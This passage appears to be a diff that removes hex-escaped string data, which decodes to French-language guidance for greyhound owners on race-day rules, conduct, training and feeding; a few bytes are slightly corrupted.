-"\x6f\x69\x67\x74\x73\x20\x64\x65\x73\x20\x4c\xe9\x76\x72\x69\x65"
-"\x72\x73\x20\x70\x6f\x75\x72\x20\x64\xe9\x74\x65\x63\x74\x65\x72"
-"\x20\x64\x65\x73\x20\x62\x6c\x65\x73\x73\x75\x72\x65\x73\x2e\x20"
-"\x44\x61\x6e\x73\x20\x6c\x65\x75\x72\x20\x69\x6e\x74\xe9\x72\xea"
-"\x74\x2c\x20\x69\x6c\x20\x70\x65\x75\x74\x20\x69\x6e\x74\x65\x72"
-"\x64\x69\x72\x65\x20\x6c\x65\x20\x64\xe9\x70\x61\x72\x74\x2e\x0d"
-"\x4f\x6e\x20\x76\x6f\x75\x73\x20\x72\x65\x6d\x65\x74\x20\x6c\x65"
-"\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x65\x20\x64\x65\x20\x6c\x61"
-"\x20\x6a\x6f\x75\x72\x6e\xe9\x65\x2c\x20\x6d\x61\x69\x73\x20\x69"
-"\x6c\x20\x79\x20\x61\xc0\x72\x61\x20\x73\x6f\x75\x76\x65\x6e\x74"
-"\x20\x64\x65\x73\x20\x6d\x6f\x64\x69\x66\x69\x63\x61\x74\x69\x6f"
-"\x6e\x73\x2e\x20\x45\x63\x6f\x75\x74\x65\x7a\x20\x62\x69\x65\x6e"
-"\x20\x6c\x65\x73\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e"
-"\x73\x20\x64\x69\x66\x66\x75\x73\xe9\x65\x73\x20\x70\x61\x72\x20"
-"\x6c\x61\x20\x73\x6f\x6e\x6f\x20\x65\x74\x20\x73\x75\x69\x76\x65"
-"\x7a\x20\x63\x65\x20\x71\x75\x27\x69\x6c\x20\x79\x20\x61\x20\x61"
-"\x75\x20\x74\x61\x62\x6c\x65\x61\x75\x20\x64\x27\x61\x66\x66\x69"
-"\x63\x68\x61\x67\x65\x2e\x0d\x0d\x41\x76\x61\x6e\x74\x20\x63\x68"
-"\x61\x71\x75\x65\x20\x63\x6f\x75\x72\x73\x65\x20\x6f\xf9\x20\x76"
-"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x65\x73\x74"
-"\x20\x69\x6e\x73\x63\x72\x69\x74\x2c\x20\x76\x6f\x75\x73\x20\x6c"
-"\x27\x61\x6d\x65\x6e\x65\x7a\x20\x61\x75\x20\x63\x6f\x6e\x74\x72"
-"\xf4\x6c\x65\x20\x64\x65\x20\x64\xe9\x70\x61\x72\x74\x20\x6d\x75"
-"\x6e\x69\x20\x64\x65\x20\x73\x61\x20\x63\x61\x73\x61\x71\x75\x65"
-"\x20\x28\x6c\x65\x20\x6e\x75\x6d\xe9\x72\x6f\x20\x65\x73\x74\x20"
-"\x61\x75\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x65\x29\x20\x65\x74"
-"\x20\x64\x65\x20\x73\x61\x20\x6d\x75\x73\x65\x6c\x69\xe8\x72\x65"
-"\x2e\x20\x4c\xe0\x2c\x20\x76\x6f\x75\x73\x20\x74\x69\x72\x65\x7a"
-"\x20\x61\x75\x20\x73\x6f\x72\x74\x20\x6c\x61\x20\x63\x61\x73\x65"
-"\x20\x64\x61\x6e\x73\x20\x6c\x61\x71\x75\x65\x6c\x6c\x65\x20\x76"
-"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x73\x65\x72"
-"\x61\x20\x70\x6c\x61\x63\xe9\x20\x61\x75\x20\x64\xe9\x70\x61\x72"
-"\x74\x2e\x0d\x0d\x41\x20\x6c\x27\x61\x70\x70\x65\x6c\x20\x64\x75"
-"\x20\x73\x74\x61\x72\x74\x65\x72\x20\x28\x6c\xe9\x76\x72\x69\x65"
-"\x72\x73\x20\x61\x75\x20\x64\xe9\x70\x61\x72\x74\x20\x64\x65\x20"
-"\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x20\x6e\xb0\x78\x29\x20\x76"
-"\x6f\x75\x73\x20\x61\x6c\x6c\x65\x7a\x20\x64\x61\x6e\x73\x20\x6c"
-"\x27\x6f\x72\x64\x72\x65\x20\x64\x65\x73\x20\x63\x61\x73\x65\x73"
-"\x2c\x20\x63\x68\x61\x63\x75\x6e\x20\x73\x65\x20\x6d\x65\x74\x20"
-"\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x6c\x61\x20\x73\x69\x65\x6e"
-"\x6e\x65\x2c\x20\x65\x74\x20\xe0\x20\x6c\x27\x6f\x72\x64\x72\x65"
-"\x20\x64\x75\x20\x73\x74\x61\x72\x74\x65\x72\x20\x28\x65\x6e\x20"
-"\x62\x6f\x69\x74\x65\x29\x20\x76\x6f\x75\x73\x20\x6c\x27\x69\x6e"
-"\x74\x72\x6f\x64\x75\x69\x72\x65\x7a\x20\x65\x6e\x20\x66\x65\x72"
-"\x6d\x61\x6e\x74\x20\x62\x69\x65\x6e\x20\x6c\x61\x20\x70\x6f\x72"
-"\x74\x65\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x6c\x75\x69\x20"
-"\x73\x61\x6e\x73\x20\x72\x61\x6c\x65\x6e\x74\x69\x72\x20\x6c\x61"
-"\x20\x6d\x69\x73\x65\x20\x65\x6e\x20\x62\x6f\x69\x74\x65\x2e\x0d"
-"\x4c\x61\x20\x63\x6f\x75\x72\x73\x65\x20\x65\x73\x74\x20\x70\x61"
-"\x72\x74\x69\x65\x2c\x20\x76\x6f\x75\x73\x20\x6e\x65\x20\x64\x65"
-"\x76\x65\x7a\x20\x70\x61\x73\x20\x63\x72\x69\x65\x72\x20\x61\x70"
-"\x72\xe8\x73\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x61"
-"\x75\x20\x72\x69\x73\x71\x75\x65\x20\x64\x65\x20\x6c\x65\x20\x66"
-"\x61\x69\x72\x65\x20\x72\x65\x76\x65\x6e\x69\x72\x20\x76\x65\x72"
-"\x73\x20\x76\x6f\x75\x73\x2e\x20\x56\x6f\x75\x73\x20\x6e\x65\x20"
-"\x64\x65\x76\x65\x7a\x20\x70\x61\x73\x20\x6c\x27\x65\x78\x63\x69"
-"\x74\x65\x72\x20\x70\x61\x72\x20\x75\x6e\x20\x6d\x6f\x79\x65\x6e"
-"\x20\x71\x75\x65\x6c\x63\x6f\x6e\x71\x75\x65\x2e\x20\x20\x56\x6f"
-"\x75\x73\x20\x76\x6f\x75\x73\x20\x72\x61\x70\x70\x72\x6f\x63\x68"
-"\x65\x7a\x20\x64\x65\x20\x6c\x61\x20\x7a\x6f\x6e\x65\x20\x64\x27"
-"\x61\x72\x72\x69\x76\xe9\x65\x20\x64\x75\x20\x6c\x65\x75\x72\x72"
-"\x65\x20\x70\x6f\x75\x72\x20\x6c\x65\x20\x72\xe9\x63\x75\x70\xe9"
-"\x72\x65\x72\x20\x64\xe8\x73\x20\x6c\x27\x61\x72\x72\x69\x76\xe9"
-"\x65\x2e\x0d\x0d\x41\x70\x72\xe8\x73\x20\x6c\x27\x61\x76\x6f\x69"
-"\x72\x20\x72\xe9\x63\x75\x70\xe9\x72\xe9\x2c\x20\x76\x6f\x75\x73"
-"\x20\xf4\x74\x65\x7a\x20\x6c\x61\x20\x6d\x75\x73\x65\x6c\x69\xe8"
-"\x72\x65\x20\x65\x74\x20\x76\x6f\x75\x73\x20\x6c\x65\x20\x72\x61"
-"\x6d\x65\x6e\x65\x7a\x20\x61\x75\x20\x72\x65\x70\x6f\x73\x2c\x20"
-"\x20\x64\x65\x20\x70\x72\xe9\x66\xe9\x72\x65\x6e\x63\x65\x20\x65"
-"\x6e\x20\x6c\x65\x20\x66\x61\x69\x73\x61\x6e\x74\x20\x75\x6e\x20"
-"\x70\x65\x75\x20\x6d\x61\x72\x63\x68\x65\x72\x20\x70\x6f\x75\x72"
-"\x20\x6c\x65\x20\x64\xe9\x74\x65\x6e\x64\x72\x65\x2e\x0d\x4c\x65"
-"\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x20\x73\x65\x72\x61\x20\x61"
-"\x66\x66\x69\x63\x68\xe9\x2e\x0d\x0d\x45\x6e\x20\x50\x2e\x56\x2e"
-"\x4c\x2e\x20\x76\x6f\x75\x73\x20\x6e\x65\x20\x64\x65\x76\x65\x7a"
-"\x20\x70\x61\x73\x20\x6c\x61\x69\x73\x73\x65\x72\x20\x6c\x65\x20"
-"\x4c\xe9\x76\x72\x69\x65\x72\x20\x76\x6f\x69\x72\x20\x6c\x65\x20"
-"\x70\x61\x72\x63\x6f\x75\x72\x73\x2c\x20\x63\x61\x72\x20\x69\x6c"
-"\x20\x70\x6f\x75\x72\x72\x61\x69\x74\x20\x63\x6f\x75\x70\x65\x72"
-"\x20\x65\x74\x20\xea\x74\x72\x65\x20\x70\xe9\x6e\x61\x6c\x69\x73"
-"\xe9\x2e\x0d\x0d\x53\x27\x69\x6c\x20\x79\x20\x61\x20\x65\x75\x20"
-"\x64\x65\x73\x20\x69\x6e\x63\x69\x64\x65\x6e\x74\x73\x2c\x20\x67"
-"\x61\x72\x64\x65\x7a\x20\x76\x6f\x74\x72\x65\x20\x63\x61\x6c\x6d"
-"\x65\x2e\x20\x4c\x61\x20\x63\x6f\x75\x72\x73\x65\x20\x65\x73\x74"
-"\x20\x75\x6e\x20\x73\x70\x6f\x72\x74\x20\x70\x6c\x65\x69\x6e\x20"
-"\x64\x27\x61\x6c\xe9\x61\x73\x20\x65\x74\x20\x6c\x65\x73\x20\x4c"
-"\xe9\x76\x72\x69\x65\x72\x73\x20\x6f\x6e\x74\x20\x70\x61\x72\x66"
-"\x6f\x69\x73\x20\x75\x6e\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d"
-"\x65\x6e\x74\x20\x74\x72\xe8\x73\x20\x64\xe9\x63\x65\x76\x61\x6e"
-"\x74\x2e\x20\x4e\x27\x61\x67\x72\x65\x73\x73\x65\x7a\x20\x70\x61"
-"\x73\x20\x6c\x65\x20\x70\x72\x6f\x70\x72\x69\xe9\x74\x61\x69\x72"
-"\x65\x20\x64\x27\x75\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x71"
-"\x75\x69\x20\x61\x20\x67\xea\x6e\xe9\x20\x6c\x65\x20\x76\xf4\x74"
-"\x72\x65\x2e\x20\x49\x6c\x20\x6e\xf9\x79\x20\x65\x73\x74\x20\x70"
-"\x6f\x75\x72\x20\x72\x69\x65\x6e\x20\x65\x74\x20\x65\x73\x74\x20"
-"\x64\xe9\x6a\xe0\x20\x61\x73\x73\x65\x7a\x20\x6d\x61\x6c\x68\x65"
-"\x75\x72\x65\x75\x78\x20\x64\x27\xea\x74\x72\x65\x20\x64\x69\x73"
-"\x71\x75\x61\x6c\x69\x66\x69\xe9\x2e\x20\x4e\x65\x20\x76\x6f\x75"
-"\x73\x20\x65\x6e\x20\x70\x72\x65\x6e\x65\x7a\x20\x70\x61\x73\x20"
-"\x61\x75\x78\x20\x6f\x62\x73\x65\x72\x76\x61\x74\x65\x75\x72\x73"
-"\x20\x6e\x69\x20\x61\x75\x20\x6a\x75\x67\x65\x20\x73\x69\x20\x76"
-"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x65\x73\x74"
-"\x20\x73\x61\x6e\x63\x74\x69\x6f\x6e\x6e\xe9\x20\x73\x61\x6e\x73"
-"\x20\x71\x75\x65\x20\x76\x6f\x75\x73\x20\x61\x79\x69\x65\x7a\x20"
-"\x76\x75\x20\x71\x75\x65\x6c\x71\x75\x65\x20\x63\x68\x6f\x73\x65"
-"\x2c\x20\x6f\x75\x20\x70\x61\x72\x63\x65\x20\x71\x75\x65\x20\x76"
-"\x6f\x75\x73\x20\x69\x6e\x63\x72\x69\x6d\x69\x6e\x65\x7a\x20\x75"
-"\x6e\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x0d\x56\x6f"
-"\x75\x73\x20\x61\x76\x65\x7a\x20\x61\x66\x66\x61\x69\x72\x65\x20"
-"\xe0\x20\x64\x65\x73\x20\x62\xe9\x6e\xe9\x76\x6f\x6c\x65\x73\x20"
-"\x65\x78\x70\xe9\x72\x69\x6d\x65\x6e\x74\xe9\x73\x2c\x20\x64\x6f"
-"\x6e\x74\x20\x6c\x65\x73\x20\x64\xe9\x63\x69\x73\x69\x6f\x6e\x73"
-"\x20\x73\x6f\x6e\x74\x2c\x20\x65\x6e\x20\x6f\x75\x74\x72\x65\x2c"
-"\x20\x63\x6f\x6e\x74\x72\xf4\x6c\xe9\x65\x73\x20\x70\x61\x72\x20"
-"\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x4c\xe9"
-"\x76\x72\x69\x65\x72\x73\x2e\x20\x43\x65\x20\x71\x75\x27\x69\x6c"
-"\x73\x20\x20\x6f\x6e\x74\x20\x76\x75\x20\xe0\x20\x31\x35\x30\x20"
-"\x6d\xe8\x74\x72\x65\x73\x20\x64\x65\x20\x76\x6f\x75\x73\x2c\x20"
-"\xe0\x20\x35\x30\x20\x4b\x6d\x2f\x68\x2c\x20\x70\x65\x75\x74\x20"
-"\x6e\x27\x61\x76\x6f\x69\x72\x20\x64\x75\x72\xe9\x20\x71\x75\x65"
-"\x20\x31\x20\x6f\x75\x20\x32\x20\x64\x69\x78\x69\xe8\x6d\x65\x73"
-"\x20\x64\x65\x20\x73\x65\x63\x6f\x6e\x64\x65\x20\x28\x32\x6d\x29"
-"\x2e\x20\x52\x61\x70\x70\x65\x6c\x65\x7a\x2d\x76\x6f\x75\x73\x20"
-"\x71\x75\x65\x20\x76\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65"
-"\x72\x20\x73\x65\x6e\x74\x20\x76\x6f\x74\x72\x65\x20\x63\x61\x6c"
-"\x6d\x65\x20\x6f\x75\x20\x76\x6f\x74\x72\x65\x20\xe9\x6e\x65\x72"
-"\x76\x65\x6d\x65\x6e\x74\x2c\x20\x71\x75\x65\x20\x73\x65\x73\x20"
-"\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x74\x20\x73\x6f\x6e"
-"\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d\x65\x6e\x74\x20\x73\x27"
-"\x65\x6e\x20\x72\x65\x73\x73\x65\x6e\x74\x65\x6e\x74\x2e\x0d\x4c"
-"\x61\x20\x6d\x65\x69\x6c\x6c\x65\x75\x72\x65\x20\x66\x61\xe7\x6f"
-"\x6e\x20\x64\x65\x20\x70\x65\x72\x64\x72\x65\x20\x65\x73\x74\x20"
-"\x64\x27\x61\x62\x6f\x72\x64\x20\x64\x65\x20\x73\x65\x20\x63\x6f"
-"\x6d\x70\x6f\x72\x74\x65\x72\x20\x65\x6e\x20\x6d\x61\x75\x76\x61"
-"\x69\x73\x20\x70\x65\x72\x64\x61\x6e\x74\x2e\x0d\x53\x69\x20\x76"
-"\x6f\x75\x73\x20\x6e\x65\x20\x70\x61\x72\x76\x65\x6e\x65\x7a\x20"
-"\x70\x61\x73\x20\xe0\x20\x76\x6f\x75\x73\x20\x63\x6f\x6e\x74\x72"
-"\xf4\x6c\x65\x72\x2c\x20\x61\x62\x61\x6e\x64\x6f\x6e\x6e\x65\x7a"
-"\x20\x6c\x65\x20\x73\x70\x6f\x72\x74\x20\x6c\xe9\x76\x72\x69\x65"
-"\x72\x2e\x0d\x53\x69\x20\x76\x6f\x75\x73\x20\x61\x76\x65\x7a\x20"
-"\x75\x6e\x65\x20\x6f\x62\x73\x65\x72\x76\x61\x74\x69\x6f\x6e\x20"
-"\xe0\x20\x66\x61\x69\x72\x65\x2c\x20\x61\x64\x72\x65\x73\x73\x65"
-"\x7a\x2d\x76\x6f\x75\x73\x20\x61\x75\x20\x63\x68\x65\x66\x20\x64"
-"\x65\x20\x70\x69\x73\x74\x65\x2c\x20\x73\x65\x75\x6c\x65\x20\x70"
-"\x65\x72\x73\x6f\x6e\x6e\x65\x20\x61\x75\x74\x6f\x72\x69\x73\xe9"
-"\x65\x20\xe0\x20\x74\x72\x61\x6e\x73\x6d\x65\x74\x74\x72\x65\x20"
-"\x6c\x65\x73\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x73"
-"\x2e\x0d\x0d\x41\x20\x6c\x27\x69\x73\x73\x75\x65\x20\x64\x65\x20"
-"\x6c\x61\x20\x72\xe9\x75\x6e\x69\x6f\x6e\x20\x6f\x6e\x20\x76\x6f"
-"\x75\x73\x20\x72\x65\x6d\x65\x74\x74\x72\x61\x20\x76\x6f\x74\x72"
-"\x65\x20\x63\x61\x72\x6e\x65\x74\x20\x64\xfb\x6d\x65\x6e\x74\x20"
-"\x72\x65\x6d\x70\x6c\x69\x2c\x20\x76\x6f\x73\x20\x70\x72\x69\x78"
-"\x2e\x20\x43\x6f\x6e\x74\x72\xf4\x6c\x65\x7a\x20\x62\x69\x65\x6e"
-"\x20\x6c\x65\x20\x63\x61\x72\x6e\x65\x74\x20\x63\x61\x72\x20\x69"
-"\x6c\x20\x70\x65\x75\x74\x20\x79\x20\x61\x76\x6f\x69\x72\x20\x65"
-"\x75\x20\x64\x65\x73\x20\x65\x72\x72\x65\x75\x72\x73\x20\x64\x65"
-"\x20\x74\x72\x61\x6e\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x71"
-"\x75\x27\x69\x6c\x20\x73\x65\x72\x61\x20\x64\x69\x66\x66\x69\x63"
-"\x69\x6c\x65\x20\x64\x65\x20\x63\x6f\x72\x72\x69\x67\x65\x72\x20"
-"\x65\x6e\x73\x75\x69\x74\x65\x2e\x0d\x53\x6f\x79\x65\x7a\x20\x70"
-"\x61\x74\x69\x65\x6e\x74\x20\x3a\x20\x4c\x65\x20\x73\x65\x63\x72"
-"\xe9\x74\x61\x72\x69\x61\x74\x20\x61\x75\x72\x61\x20\x63\x6f\x6e"
-"\x73\x61\x63\x72\xe9\x20\x6c\x61\x20\x70\x61\x75\x73\x65\x20\x64"
-"\x75\x20\x64\xe9\x6a\x65\x75\x6e\x65\x72\x20\xe0\x20\x70\x72\xe9"
-"\x2d\x72\x65\x6d\x70\x6c\x69\x72\x20\x6c\x65\x73\x20\x63\x61\x72"
-"\x6e\x65\x74\x73\x2c\x20\x6d\x61\x69\x73\x20\x6c\x61\x69\x73\x73"
-"\x65\x7a\x20\x61\x75\x20\x6a\x75\x67\x65\x20\x6c\x65\x20\x74\x65"
-"\x6d\x70\x73\x20\x64\x27\x69\x6e\x73\x63\x72\x69\x72\x65\x20\x6c"
-"\x65\x20\x63\x6c\x61\x73\x73\x65\x6d\x65\x6e\x74\x20\x65\x74\x20"
-"\x64\x65\x20\x73\x69\x67\x6e\x65\x72\x2e\x20\x56\x6f\x75\x73\x20"
-"\x61\x76\x65\x7a\x20\x70\x65\x75\x74\x2d\xea\x74\x72\x65\x20\x75"
-"\x6e\x65\x20\x6c\x6f\x6e\x67\x75\x65\x20\x64\x69\x73\x74\x61\x6e"
-"\x63\x65\x20\xe0\x20\x70\x61\x72\x63\x6f\x75\x72\x69\x72\x20\x70"
-"\x6f\x75\x72\x20\x72\x65\x6e\x74\x72\x65\x72\x20\x63\x68\x65\x7a"
-"\x20\x76\x6f\x75\x73\x2c\x20\x6d\x61\x69\x73\x20\x6f\x6e\x20\x6e"
-"\x65\x20\x70\x65\x75\x74\x20\x70\x61\x73\x20\x76\x6f\x75\x73\x20"
-"\x72\x65\x6e\x64\x72\x65\x20\x6c\x65\x20\x63\x61\x72\x6e\x65\x74"
-"\x20\x6d\xea\x6d\x65\x20\x73\x69\x20\x76\x6f\x74\x72\x65\x20\x63"
-"\x68\x69\x65\x6e\x20\x61\x20\xe9\x74\xe9\x20\x70\x72\xe9\x6d\x61"
-"\x74\x75\x72\xe9\x6d\x65\x6e\x74\x20\xe9\x6c\x69\x6d\x69\x6e\xe9"
-"\x2e\x20\x56\x6f\x75\x73\x20\x70\x6f\x75\x76\x65\x7a\x20\x74\x6f"
-"\x75\x6a\x6f\x75\x72\x73\x20\x64\x65\x6d\x61\x6e\x64\x65\x72\x20"
-"\xe0\x20\x75\x6e\x20\x61\x6d\x69\x20\x64\x65\x20\x72\xe9\x63\x75"
-"\x70\xe9\x72\x65\x72\x20\x6c\x65\x20\x63\x61\x72\x6e\x65\x74\x20"
-"\xe0\x20\x76\x6f\x74\x72\x65\x20\x70\x6c\x61\x63\x65\x20\x73\x69"
-"\x20\x76\x6f\x75\x73\x20\x74\x65\x6e\x65\x7a\x20\xe0\x20\x70\x61"
-"\x72\x74\x69\x72\x20\x74\xf4\x74\x2e\x0d\x0d\x45\x6e\x74\x72\x65"
-"\x74\x69\x65\x6e\x20\x3a\x0d\x4c\x65\x73\x20\x70\x72\x6f\x62\x6c"
-"\xe8\x6d\x65\x73\x20\x64\x65\x20\x6c\x27\x65\x6e\x74\x72\x61\xee"
-"\x6e\x65\x6d\x65\x6e\x74\x2c\x20\x64\x65\x20\x6c\x27\x61\x6c\x69"
-"\x6d\x65\x6e\x74\x61\x74\x69\x6f\x6e\x2c\x20\x64\x65\x73\x20\x73"
-"\x6f\x69\x6e\x73\x20\x73\x6f\x75\x6c\xe8\x76\x65\x6e\x74\x20\x62"
-"\x65\x61\x75\x63\x6f\x75\x70\x20\x64\x65\x20\x63\x6f\x6e\x74\x72"
-"\x6f\x76\x65\x72\x73\x65\x73\x2c\x20\x63\x68\x61\x63\x75\x6e\x20"
-"\x61\x79\x61\x6e\x74\x20\x73\x61\x20\x72\x65\x63\x65\x74\x74\x65"
-"\x2c\x20\x70\x61\x72\x66\x6f\x69\x73\x20\x73\x61\x20\x74\x68\xe9"
-"\x6f\x72\x69\x65\x2e\x0d\x0d\x45\x6e\x74\x72\x61\xee\x6e\x65\x6d"
-"\x65\x6e\x74\x20\x3a\x0d\x54\x6f\x75\x74\x20\x65\x6e\x74\x72\x61"
-"\xee\x6e\x65\x6d\x65\x6e\x74\x20\x63\x6f\x6d\x70\x72\x65\x6e\x64"
-"\x20\x75\x6e\x20\x74\x72\x61\x76\x61\x69\x6c\x20\x68\x69\x76\x65"
-"\x72\x6e\x61\x6c\x20\x64\x65\x20\x66\x6f\x6e\x64\x2c\x20\x64\x65"
-"\x73\x20\x70\x68\x61\x73\x65\x73\x20\x64\x65\x20\x74\x72\x61\x76"
-"\x61\x69\x6c\x20\x6d\x6f\x64\xe9\x72\xe9\x20\x28\x6d\x61\x72\x63"
-"\x68\x65\x2c\x20\x74\x72\x6f\x74\x29\x2c\x20\x64\x65\x73\x20\x70"
-"\x68\x61\x73\x65\x73\x20\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65"
-"\x20\x28\x6c\x65\x75\x72\x72\x65\x2c\x20\x62\x61\x6c\x6c\x65\x2c"
-"\x20\x73\x70\x72\x69\x6e\x74\x2c\x20\x65\x74\x63\x2e\x2e\x2e\x29"
-"\x2e\x20\x4c\x65\x20\x64\x6f\x73\x61\x67\x65\x20\x76\x61\x72\x69"
-"\x65\x20\x73\x65\x6c\x6f\x6e\x20\x6c\x61\x20\x72\x61\x63\x65\x20"
-"\x28\x6c\x65\x20\x67\x72\x65\x79\x68\x6f\x75\x6e\x64\x2c\x20\x70"
-"\x6c\x75\x73\x20\x72\x61\x70\x69\x64\x65\x2c\x20\x65\x73\x74\x20"
-"\x6d\x6f\x69\x6e\x73\x20\x72\xe9\x73\x69\x73\x74\x61\x6e\x74\x20"
-"\x71\x75\x65\x20\x6c\x65\x73\x20\x61\x75\x74\x72\x65\x73\x29\x2c"
-"\x20\x6c\x27\xe9\x70\x6f\x71\x75\x65\x2c\x20\x6c\x27\x69\x6e\x64"
-"\x69\x76\x69\x64\x75\x2e\x0d\x43\x65\x72\x74\x61\x69\x6e\x73\x20"
-"\x6f\x6e\x74\x20\x62\x65\x73\x6f\x69\x6e\x20\x64\x65\x20\x62\x65"
-"\x61\x75\x63\x6f\x75\x70\x20\x64\x27\x65\x6e\x74\x72\x61\xee\x6e"
-"\x65\x6d\x65\x6e\x74\x2c\x20\x64\x27\x61\x75\x74\x72\x65\x73\x20"
-"\x70\x65\x75\x2c\x20\x6d\x61\x69\x73\x20\x69\x6c\x20\x6e\x27\x79"
-"\x20\x61\x20\x67\x75\xe8\x72\x65\x20\x64\x65\x20\x62\x6f\x6e\x73"
-"\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x73\x61\x6e\x73\x20"
-"\x65\x66\x66\x6f\x72\x74\x73\x20\x64\x75\x20\x70\x72\x6f\x70\x72"
-"\x69\xe9\x74\x61\x69\x72\x65\x2e\x0d\x49\x6c\x20\x66\x61\x75\x74"
-"\x20\x64\x75\x20\x74\x65\x6d\x70\x73\x2c\x20\x61\x75\x20\x6d\x6f"
-"\x69\x6e\x73\x20\x74\x72\x6f\x69\x73\x20\x73\x65\x6d\x61\x69\x6e"
-"\x65\x73\x2c\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x70\x6c\x75\x73"
-"\x69\x65\x75\x72\x73\x20\x6d\x6f\x69\x73\x20\x70\x6f\x75\x72\x20"
-"\x6d\x65\x74\x74\x72\x65\x20\x75\x6e\x20\x6c\xe9\x76\x72\x69\x65"
-"\x91\x20\x65\x6e\x20\x66\x6f\x72\x6d\x65\x2e\x20\x4c\x65\x73\x20"
-"\x72\x69\x73\x71\x75\x65\x50\x20\x64\x65\x20\x62\x6c\x65\x73\x73"
-"\x75\x72\x65\x73\x20\x73\x6f\x6e\x74\x20\xe9\x6c\x65\x76\xe9\x73"
-"\x20\x65\x6e\x20\x63\x61\x73\x20\x64\x65\x20\x6d\xe9\x66\x6f\x72"
-"\x6d\x65\x20\x6f\x75\x20\x64\x65\x20\x73\x75\x70\x65\x72\x20\x63"
-"\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x2e\x0d\x42\x65\x61\x75\x63\x6f"
-"\x75\x70\x20\x28\x6d\x61\x69\x73\x20\x70\x61\x73\x20\x74\x6f\x75"
-"\x74\x65\x73\x29\x20\x20\x64\x65\x20\x66\x65\x6d\x65\x6c\x6c\x65"
-"\x73\x20\x61\x6d\xe9\x6c\x69\x6f\x72\x65\x6e\x74\x20\x6c\x65\x75"
-"\x72\x20\x76\x69\x74\x65\x73\x73\x65\x20\x61\x76\x61\x6e\x74\x20"
-"\x6c\x65\x73\xd8\x63\x68\x61\x6c\x65\x75\x72\x73\x2c\x20\x65\x74"
-"\x20\x62\x61\x69\x73\x73\x65\x6e\x74\x20\x64\x65\x20\x66\x6f\x72"
-"\x6d\x65\x20\x70\x65\x6e\x64\x61\x6e\x74\x20\x71\x75\x61\x74\x72"
-"\x65\x20\xe0\x20\x68\x75\x69\x74\x20\x73\x65\x6d\x61\x69\x6e\x65"
-"\x73\x20\x61\x70\x72\xe8\x73\x20\x6c\x65\x20\x6d\x69\x6c\x69\x65"
-"\x75\x20\x64\x65\x73\x20\x63\x68\x61\x6c\x65\x75\x72\x73\x2e\x20"
-"\x4c\x61\x20\x76\x69\x74\x65\x73\x73\x65\x20\x6d\x61\x78\x69\x6d"
-"\x75\x6d\x20\x65\x73\x74\x20\x61\x4a\x74\x65\x69\x6e\x74\x65\x20"
-"\x76\x65\x72\x73\x20\x31\x32\x20\x2d\x20\x31\x35\x20\x6d\x6f\x69"
-"\x73\x2c\x20\x6d\x61\x69\x73\x20\x61\x76\x65\x63\x20\x6c\x65\x20"
-"\x6d\xe9\x74\x69\x65\x72\x2c\x20\x6c\x65\x73\x20\x6d\x65\x69\x6c"
-"\x6c\x65\x75\x72\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20"
-"\x73\x6f\x6e\x74\x20\x64\x65\x20\x32\x20\xe0\x20\x35\x20\x61\x6e"
-"\x73\x2e\x20\x0d\x50\x61\x73\x73\xe9\x20\x73\x69\x78\x20\x61\x6e"
-"\x73\x2c\x20\x6c\x65\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x62\x61"
-"\x69\x73\x73\x65\x2e\x0d\x0d\x0d\x0d\x0d\x41\x6c\x69\x6d\x65\x6e"
-"\x74\x61\x74\x69\x6f\x6e\x20\x3a\x0d\x0d\x45\x6c\x6c\x65\x20\x70"
-"\x65\x75\x74\x20\xea\x74\x72\x65\x20\x74\x72\x61\x64\x69\x74\x69"
-"\x6f\x6e\x6e\x65\x6c\x6c\x65\x2c\x20\x73\x61\x6e\x73\x20\x74\x72"
-"\x6f\x70\x20\x64\x65\x20\x6c\xe9\x67\x75\x6d\x65\x73\x20\x6f\x75"
-"\x20\x64\x65\x20\x66\xe9\x63\x75\x6c\x65\x6e\x74\x73\x2c\x20\x6f"
-"\x75\x20\xe0\x20\x62\x61\x73\x65\x20\x64\x27\x61\x6c\x69\x6d\x65"
-"\x6e\x74\x73\x20\x64\x75\x20\x63\x6f\x6d\x6d\x65\x72\x63\x65\x2e"
-"\x20\x49\x6c\x20\x76\x61\x75\x74\x20\x6d\x69\x65\x75\x78\x20\x64"
-"\x65\x75\x78\x20\x6f\x75\x20\x74\x72\x6f\x69\x73\x20\x72\x65\x70"
-"\x61\x73\x20\x70\x61\x72\x20\x6a\x6f\x75\x72\x20\x71\x75\x27\x75"
-"\x6e\x20\x73\x65\x75\x6c\x2e\x20\x41\x74\x74\x65\x6e\x74\x69\x6f"
-"\x6e\x20\x61\x75\x78\x20\x65\x78\x63\xe8\x73\x20\x64\x65\x20\x63"
-"\x61\x6c\x63\x69\x75\x6d\x2c\x20\x64\x65\x20\x70\x68\x6f\x73\x70"
-"\x68\x6f\x72\x65\x2c\x20\x64\x65\x20\x76\x69\x74\x61\x6d\x69\x6e"
-"\x65\x73\x20\x44\x2e\x20\x4e\x65\x20\x64\x6f\x6e\x6e\x65\x7a\x20"
